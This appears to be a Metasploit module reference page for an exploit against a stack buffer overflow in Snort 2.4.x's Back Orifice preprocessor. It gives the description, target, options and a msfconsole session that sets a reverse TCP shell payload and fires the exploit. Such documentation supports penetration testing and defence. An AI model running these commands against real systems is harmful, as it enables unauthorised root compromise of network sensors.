Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Snort Back Orifice Pre-Preprocessor Remote Exploit

This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.


Rank

  • Good

Authors

  • KaiJern Lau < xwings [at] mysec.org >

References


Exploit Targets

  • 0 - Debian 3.1 Sarge (default)

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/ids/snortbopre
msf exploit(snortbopre) > show payloads
msf exploit(snortbopre) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(snortbopre) > set LHOST [MY IP ADDRESS]
msf exploit(snortbopre) > set RHOST [TARGET IP]
msf exploit(snortbopre) > exploit


Module Options

RHOST The target address
RPORT The target port (default: 9080)
CHOST The local client address
CPORT The local client port
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session